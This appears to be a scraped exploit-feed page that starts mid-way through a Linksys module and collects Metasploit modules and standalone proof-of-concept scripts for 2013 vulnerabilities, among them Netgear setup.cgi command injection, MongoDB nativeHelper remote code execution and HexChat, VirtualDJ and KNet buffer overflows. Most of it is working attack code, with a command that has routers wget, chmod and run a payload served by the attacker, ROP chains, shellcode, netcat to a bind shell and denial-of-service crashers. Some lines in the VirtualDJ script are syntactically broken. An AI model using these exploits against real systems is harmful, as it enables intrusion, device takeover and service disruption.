#SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # # execute # cmd = "/tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) 
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request the ELF payload -- Maybe it can't connect back to us?") end end end

==> MongoDB nativeHelper.apply Remote Code Execution

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'MongoDB nativeHelper.apply Remote Code Execution', 'Description' => %q{ This module exploits the nativeHelper feature from spiderMonkey, which allows controlling execution by calling it with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze. }, 'Author' => [ 'agix' # @agixid # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'CVE', '2013-1892' ], [ 'OSVDB', '91632' ], [ 'BID', '58695' ], [ 'URL', 'http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/' ] ], 'Platform' => 'linux', 'Targets' => [ [ 'Linux - mongod 2.2.3 - 32bits', { 'Arch' => ARCH_X86, 'mmap' => [ 0x0816f768, # mmap64@plt # from mongod 0x08666d07, # add esp, 0x14 / pop ebx / pop ebp / ret # from mongod 0x31337000, 0x00002000, 0x00000007, 0x00000031, 0xffffffff, 0x00000000, 0x00000000, 0x0816e4c8, # memcpy@plt # from mongod 0x31337000, 0x31337000, 0x0c0b0000, 0x00002000 ], 'ret' => 0x08055a70, # ret # from mongod 'gadget1' => 0x0836e204, # mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c] # These gadgets need to be composed with bytes < 0x80 'gadget2' => 0x08457158, # xchg esp,eax / add esp,0x4 / pop ebx / pop ebp / ret <== this gadget must xchg esp,eax and then increment ESP 'gadget3' => 0x08351826, # add esp,0x20 / pop esi / pop edi / pop ebp <== this gadget placed before gadget2 increment ESP to escape gadget2 'gadget4' => 0x08055a6c, # pop eax / ret 'gadget5' => 0x08457158 # xchg esp,eax } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 24
2013', 'License' => MSF_LICENSE )) register_options( [ Opt::RPORT(27017), OptString.new('DB', [ true, "Database to use", "admin"]), OptString.new('COLLECTION', [ false, "Collection to use (it must exist). Better to leave empty", ""]), OptString.new('USERNAME', [ false, "Login to use", ""]), OptString.new('PASSWORD', [ false, "Password to use", ""]) ], self.class) end def exploit begin connect if require_auth? print_status("Mongo server #{datastore['RHOST']} uses authentication...") if !datastore['USERNAME'] || !datastore['PASSWORD'] disconnect fail_with(Exploit::Failure::BadConfig, "USERNAME and PASSWORD must be provided") end if do_login==0 disconnect fail_with(Exploit::Failure::NoAccess, "Authentication failed") end else print_good("Mongo server #{datastore['RHOST']} doesn't use authentication") end if datastore['COLLECTION'] && datastore['COLLECTION'] != "" collection = datastore['COLLECTION'] else collection = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz') if read_only?(collection) disconnect fail_with(Exploit::Failure::BadConfig, "#{datastore['USERNAME']} has read-only access, please provide an existing collection") else print_good("New document created in collection #{collection}") end end print_status("Let's exploit, heap spray could take some time...") my_target = target shellcode = Rex::Text.to_unescape(payload.encoded) mmap = my_target['mmap'].pack("V*") ret = [my_target['ret']].pack("V*") gadget1 = "0x#{my_target['gadget1'].to_s(16)}" gadget2 = Rex::Text.to_hex([my_target['gadget2']].pack("V")) gadget3 = Rex::Text.to_hex([my_target['gadget3']].pack("V")) gadget4 = Rex::Text.to_hex([my_target['gadget4']].pack("V")) gadget5 = Rex::Text.to_hex([my_target['gadget5']].pack("V")) shellcode_var="a"+Rex::Text.rand_text_hex(4) sizechunk_var="b"+Rex::Text.rand_text_hex(4) chunk_var="c"+Rex::Text.rand_text_hex(4) i_var="d"+Rex::Text.rand_text_hex(4) array_var="e"+Rex::Text.rand_text_hex(4) ropchain_var="f"+Rex::Text.rand_text_hex(4)
chunk2_var="g"+Rex::Text.rand_text_hex(4) array2_var="h"+Rex::Text.rand_text_hex(4) # nopsled + shellcode heapspray payload_js = shellcode_var+'=unescape("'+shellcode+'");' payload_js << sizechunk_var+'=0x1000;' payload_js << chunk_var+'="";' payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk_var+'+=unescape("%u9090%u9090"); } ' payload_js << chunk_var+'='+chunk_var+'.substring(0,('+sizechunk_var+'-'+shellcode_var+'.length));' payload_js << array_var+'=new Array();' payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array_var+'['+i_var+']='+chunk_var+'+'+shellcode_var+'; } ' # retchain + ropchain heapspray payload_js << ropchain_var+'=unescape("'+Rex::Text.to_unescape(mmap)+'");' payload_js << chunk2_var+'="";' payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk2_var+'+=unescape("'+Rex::Text.to_unescape(ret)+'"); } ' payload_js << chunk2_var+'='+chunk2_var+'.substring(0,('+sizechunk_var+'-'+ropchain_var+'.length));' payload_js << array2_var+'=new Array();' payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array2_var+'['+i_var+']='+chunk2_var+'+'+ropchain_var+'; } ' # Trigger and first ropchain payload_js << 'nativeHelper.apply({"x" : '+gadget1+'}, ' payload_js << '["A"+"'+gadget3+'"+"'+Rex::Text.rand_text_hex(12)+'"+"'+gadget2+'"+"'+Rex::Text.rand_text_hex(28)+'"+"'+gadget4+'"+"\\x20\\x20\\x20\\x20"+"'+gadget5+'"]);' request_id = Rex::Text.rand_text(4) packet = request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB']+"."+collection+"\x00" #fullCollectionName (db.collection) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\x01\x00\x00\x00" #numberToReturn (1) where = "\x02\x24\x77\x68\x65\x72\x65\x00" where << [payload_js.length+4].pack("L") where << payload_js+"\x00" where.insert(0, where.length +.pack("L")) packet += where packet.insert(0, packet.length 
+.pack("L")) sock.put(packet) disconnect rescue ::Exception => e fail_with(Exploit::Failure::Unreachable, "Unable to connect") end end def require_auth? request_id = Rex::Text.rand_text(4) packet = "\x3f\x00\x00\x00" #messageLength (63) packet << request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY) packet << "\x00\x00\x00\x00" #flags packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (admin.$cmd) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\x01\x00\x00\x00" #numberToReturn (1) #query ({"listDatabases"=>1}) packet << "\x18\x00\x00\x00\x10\x6c\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00" sock.put(packet) response = sock.get_once have_auth_error?(response) end def read_only?(collection) request_id = Rex::Text.rand_text(4) _id = "\x07_id\x00"+Rex::Text.rand_text(12)+"\x02" key = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+"\x00" value = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+"\x00" insert = _id+key+[value.length].pack("L")+value+"\x00" packet = [insert.length+24+datastore['DB'].length+6].pack("L") #messageLength packet << request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd2\x07\x00\x00" #opCode (2002 Insert Document) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB'] + "." 
+ collection + "\x00" #fullCollectionName (DB.collection) packet << [insert.length+4].pack("L") packet << insert sock.put(packet) request_id = Rex::Text.rand_text(4) packet = [datastore['DB'].length + 61].pack("L") #messageLength (66) packet << request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 Query) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\xff\xff\xff\xff" #numberToReturn (1) packet << "\x1b\x00\x00\x00" packet << "\x01\x67\x65\x74\x6c\x61\x73\x74\x65\x72\x72\x6f\x72\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00" sock.put(packet) response = sock.get_once have_auth_error?(response) end def do_login print_status("Trying #{datastore['USERNAME']}/#{datastore['PASSWORD']} on #{datastore['DB']} database") nonce = get_nonce status = auth(nonce) return status end def auth(nonce) request_id = Rex::Text.rand_text(4) packet = request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\xff\xff\xff\xff" #numberToReturn (1) #{"authenticate"=>1.0, "user"=>"root", "nonce"=>"94e963f5b7c35146", "key"=>"61829b88ee2f8b95ce789214d1d4f175"} document = "\x01\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x65" document << "\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x02\x75\x73\x65\x72\x00" document << [datastore['USERNAME'].length + 1].pack("L") # +1 due null byte termination document << datastore['USERNAME'] + "\x00" document << "\x02\x6e\x6f\x6e\x63\x65\x00\x11\x00\x00\x00" document << nonce + "\x00" document << "\x02\x6b\x65\x79\x00\x21\x00\x00\x00" document << Rex::Text.md5(nonce + datastore['USERNAME'] + Rex::Text.md5(datastore['USERNAME'] + ":mongo:" + datastore['PASSWORD'])) + "\x00" document 
<< "\x00" #Calculate document length document.insert(0, document.length +.pack("L")) packet += document #Calculate messageLength packet.insert(0, [(packet.length + 4)].pack("L")) #messageLength sock.put(packet) response = sock.get_once if have_auth_error?(response) print_error("Bad login or DB") return 0 else print_good("Successful login on DB #{datastore['db']}") return 1 end end def get_nonce request_id = Rex::Text.rand_text(4) packet = [datastore['DB'].length + 57].pack("L") #messageLength (57+DB.length) packet << request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\x01\x00\x00\x00" #numberToReturn (1) #query {"getnonce"=>1.0} packet << "\x17\x00\x00\x00\x01\x67\x65\x74\x6e\x6f\x6e\x63\x65\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00" sock.put(packet) response = sock.get_once documents = response[36..1024] #{"nonce"=>"f785bb0ea5edb3ff", "ok"=>1.0} nonce = documents[15..30] end def have_auth_error?(response) #Response header 36 bytes long documents = response[36..1024] #{"errmsg"=>"auth fails", "ok"=>0.0} #{"errmsg"=>"need to login", "ok"=>0.0} if documents.include?('errmsg') || documents.include?('unauthorized') return true else return false end end

==> Netgear DGN1000B setup.cgi Remote Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netgear DGN1000B setup.cgi Remote Command Execution',
      'Description' => %q{
        Some Netgear Routers are vulnerable to authenticated OS Command injection. The
        vulnerability exists in the web interface, specifically in the setup.cgi component,
        when handling the TimeToLive parameter. Default credentials are always a good
        starting point, admin/admin or admin/password could be a first try. Since it is a
        blind os command injection vulnerability, there is no output for the executed
        command when using the cmd generic payload. A ping command against a controlled
        system could be used for testing purposes.
      },
      'Author' =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'BID', '57836' ],
          [ 'EDB', '24464' ],
          [ 'OSVDB', '89985' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-005' ]
        ],
      'DisclosureDate' => 'Feb 06 2013',
      'Privileged' => true,
      'Platform' => ['linux','unix'],
      'Payload' =>
        {
          'DisableNops' => true
        },
      'Targets' =>
        [
          [ 'CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsbe Payload',
            {
              'Arch' => ARCH_MIPSBE,
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget' => 1,
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]),
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
      ], self.class)
  end

  def request(cmd,user,pass,uri)
    begin
      res = send_request_cgi(
        {
          'uri' => uri,
          'method' => 'POST',
          'authorization' => basic_auth(user,pass),
          'vars_post' => {
            "UPnP" => "UPnP",
            "AdverTime" => rand_text_numeric(2),
            "TimeToLive" => "`#{cmd}`",
            "save" => "+Anwenden",
            "todo" => "save",
            "this_file" => "upnp.htm",
            "next_file" => "upnp.htm",
            "h_UPnP" => "enable",
            "hiddenAdverTime" => rand_text_numeric(2),
            "hiddenTimeToLive" => rand_text_numeric(1)
          }
        })
      return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end

  def exploit
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
    uri = '/setup.cgi'
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    rhost = datastore['RHOST']
    rport = datastore['RPORT']

    #
    # testing Login
    #
    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
    begin
      res = send_request_cgi({
        'uri' => uri,
        'method' => 'GET',
        'authorization' => basic_auth(user,pass)
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
      if [200, 301].include?(res.code)
        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
      else
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end

    if target.name =~ /CMD/
      if not (datastore['CMD'])
        fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
      end
      cmd = payload.encoded
      res = request(cmd,user,pass,uri)
      if (!res)
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
      else
        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
      end
      return
    end

    #thx to Juan for his awesome work on the mipsbe elf support
    @pl = generate_payload_exe
    @elf_sent = false

    #
    # start our server
    #
    resource_uri = '/' + downfile

    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end

      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end

      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})

      datastore['SSL'] = true if ssl_restore
    end

    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the Netgear device to download #{service_url}")
    #this filename is used to store the payload on the device
    filename = rand_text_alpha_lower(8)

    #not working if we send all command together -> lets take three requests
    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
    res = request(cmd,user,pass,uri)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end

    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
    register_file_for_cleanup("/tmp/#{filename}")

    #
    # chmod
    #
    cmd = "chmod 777 /tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the Netgear device to chmod #{downfile}")
    res = request(cmd,user,pass,uri)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end

    #
    # execute
    #
    cmd = "/tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the Netgear device to execute #{downfile}")
    res = request(cmd,user,pass,uri)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")

    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
      end
    end
  end
end

==> Novell ZENworks Configuration Management Remote Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

==> HexChat 2.9.4 Local Exploit Submission

http://rss.feedsportal.com/c/32479/f/477548/index.rss

#!/usr/bin/python
# HexChat 2.9.4 Local Exploit
# Bug found by Jules Carter < @iMulitia >
# Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com >
# http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
junk1 = "B"*30
shellcode = (
# msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c
""
)
junk2 = "A"*(13306-len(shellcode))
stage1 = "\x4c\x4c\x77\x21" # 21 byte jump (JA)
ret = "\x63\x64\x62\x68" # ASCII PPR
junk3 = "C"*29
stage2 = "\x61"*38 # POPAD x 38
stage2 += "\x54" # PUSH ESP
stage2 += "\xE9" # RETN # This byte is a bad char, but gets converted to RETN and \x88
junk4 = "D"*11586
print "Copy this text, and enter into HexChat's textbox: \"/server [string]\""
print junk1 + shellcode + junk2 + stage1 + ret + junk3 + stage2 + junk4

==> Easy DVD Player (libav) libavcodec_plugin.dll DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

#!/usr/bin/python
# Exploit Title:Easy DVD Player (libav) libavcodec_plugin.dll DOS
# Download link :http://www.easy-dvd-player.com/download.htm
# Author: metacom
# version: version V3.5.1
# Category: poc
# Tested on: windows 7 German
'''
read violation on 0x00000010 libavcodec_plugin.dll
(714.520): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ZJMedia\Easy DVD Player\plugins\libavcodec_plugin.dll -
eax=ffffffff ebx=01c7b068 ecx=757a98da edx=00000000 esi=0432f93c edi=ffffffff
eip=61acc6d0 esp=0432f900 ebp=62134ce0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
libavcodec_plugin!vlc_entry__1_1_0g+0x1b350:
61acc6d0 8b4210 mov eax,dword ptr [edx+10h] ds:0023:00000010=????????
'''
filename= "Easy.nsv"
buffer = "\xCC" * 5000
textfile = open(filename , 'w')
textfile.write(buffer)

==> Personal File Share 1.0 DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

#!/usr/bin/python
#Exploit Title: Personal File Share 1.0 DoS
#Date: 2nd April 2013
#Exploit Author: npn
#Vendor Homepage: http://www.srplab.com/
#Software Link: http://download.cnet.com/Personal-File-Share/3000-18506_4-75893424.html
#Version: 1.0
#Tested on: Windows XP SP3 English

import socket, sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.32.129", 8080))
buffer = "GET /"
buffer += "A"*5000
buffer += " HTTP/1.1\r\n\r\n"
sock.send(buffer)
sock.close()

==> VirtualDJ Pro/Home <=7.3 Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

#Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
#By: Alexandro Sánchez Bach | functionmixer.blogspot.com
#More info: http://www.youtube.com/watch?v=PJeaWqMJRm0

import string

def unicodeHex(c):
    c = hex(ord(c))[2:].upper()
    if len(c)==1: c = "0"+c
    return c+"00"

def movEAX(s):
    #Arrays
    s = map(ord, list(s))
    inst = []
    target = 512, 512, 512,
    carry = [0,-2,-2,-2]
    for i in range(4):
        if s[i] < 0x10:
            target[i] = 256
            if i < 3:
                carry[i+1] = -1
    diff = [target[b] - s[b] for b in range(4)]

    #Gen instructions
    for i in range(3):
        target = [target[b] - diff[b]/4 for b in range(4)]
        inst += [[diff[b]/4 for b in range(4)]]
    target = [target[b] - s[b] + carry[b] for b in range(4)]
    inst += [target]

    #Remove character '\'
    for b in range(4):
        if ord("[") in [inst[i][b] for i in range(4)] or \
           ord("\\") in [inst[i][b] for i in range(4)] or \
           ord("]") in [inst[i][b] for i in range(4)]:
            for i in range(4):
                inst[i][b] = inst[i][b]+5*((-1)**(i))

    inst = "\x2D"+"".join(map(chr, i)) for i in
    return "".join(inst)

#Shellcode: Run cmd.exe
shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"

retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2
shellcode += retAddress

while len(shellcode) % 4 != 0:
    shellcode += '\x90'

exploit = ""
for i in range(0,len(shellcode),4)[::-1]:
    exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F" #EAX = 0
    exploit += movEAX(shellcode[i:i+4]) #EAX = shellcode[i:i+4]
    exploit += "\x50" #PUSH EAX
exploit += '\x54' #PUSH ESP
exploit += '\xC3' #RET

c = 0
for i in exploit:
    if i in string.ascii_letters:
        c+=1
exploit += "A"*(4100-c)
exploit += "FSFD"
print exploit
#Paste the generated code in the tag 'Title' of the MP3 file.

==> Novell GroupWise 12.0 SecManageRecipientCertificates method Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
<html>
<Title>- Novell GroupWise 12.0 SecManageRecipientCertificates method Exploit -</Title>
<object id=ctrl classid='clsid:{BFEC5A01-1EB1-11D1-BC96-00805FC1C85A}'></object>
<script language='javascript'>
ctrl.SecManageRecipientCertificates(202116108)
</script>

==> Novell GroupWise 12.0 InvokeContact method Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
<html>
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
<object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
<script language='javascript'>
ctrl.InvokeContact(202116108)
</script>

==> KNet Web Server 1.04b - Buffer Overflow SEH Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7

require 'net/http'
require 'uri'
require 'socket'

############################################
# bind port 4444
sc_bind = ""
###########################################
sploit = "\x90" * 1234
sploit += "\xFF\x64\x24\x5C" # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code at ESP+5C
sploit += "\xE3\x74\x24\x6C" # seh | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll]
sploit += "\x90" * 80
sploit += sc_bind
sploit += "\x90" * 80
########################################

puts "KNet Web Server - Buffer Overflow SEH Exploit\r\n by Myo Soe, http://yehg.net/\n\n"

target = ARGV[0]

def exploit(t,s)
  target = 'http://' + t
  sploit = s
  puts "[*] Sending exploit to #{target}...\n"
  url = URI.parse(target)
  res = Net::HTTP.start(url.host, url.port) {|http|
    http.get('/' + sploit)
  }
end

def connect(t)
  sleep(1)
  target = t
  puts "[*] Opening Shell ..\n\n";
  system("nc #{target} 4444")
end

t1=Thread.new{exploit(target,sploit)}
t2=Thread.new{connect(target)}
t1.join
t2.join

==> Konftel 300IP SIP-based Conference Phone <= 2.1.2 - Remote Bypass Reboot Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

#!/bin/bash
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
#
# by Todor Donev / 03.2013 / Sofia,Bulgaria
# email: todor dot donev at gmail com
# type: hardware
#
# The Konftel 300IP is a flexible SIP-based conference phone,
# perfect for companies that use IP voice services. Its clear,
# natural sound comes from OmniSound HD, Konftels patented
# wideband audio technology. The stylishly designed
# Konftel 300IP is packed with intelligent features for more
# efficient conference calls. Record and store meetings on a
# SD memory card. Use the conference guide to call
# pre-programmed groups with just a few simple pushes of a
# button. Conveniently import and export contact details via
# the Web interface. Create your own phone book with the
# personal user profile feature. The Konftel 300IP is also
# ideal for larger conferences since it can accommodate
# expansion microphones, an external wireless headset and a
# PA system. With the Konftel 300IP your company will have
# a conference phone that combines all the benefits of IP
# voice service with innovative new features.
#
# Example usage:
# [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
# Rebooting 192.168.1.180..
# Sleeping 30 secs, before rebooting
# curl: (7) couldn't connect to host
#
# Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends!

if [ $# != 1 ]; then
    echo "usg: $0 <victim>"
    exit;
fi

echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit"
echo "Rebooting $1.."
curl http://$1/cgi-bin/dorestart.cgi?doit=Reboot &>/dev/null
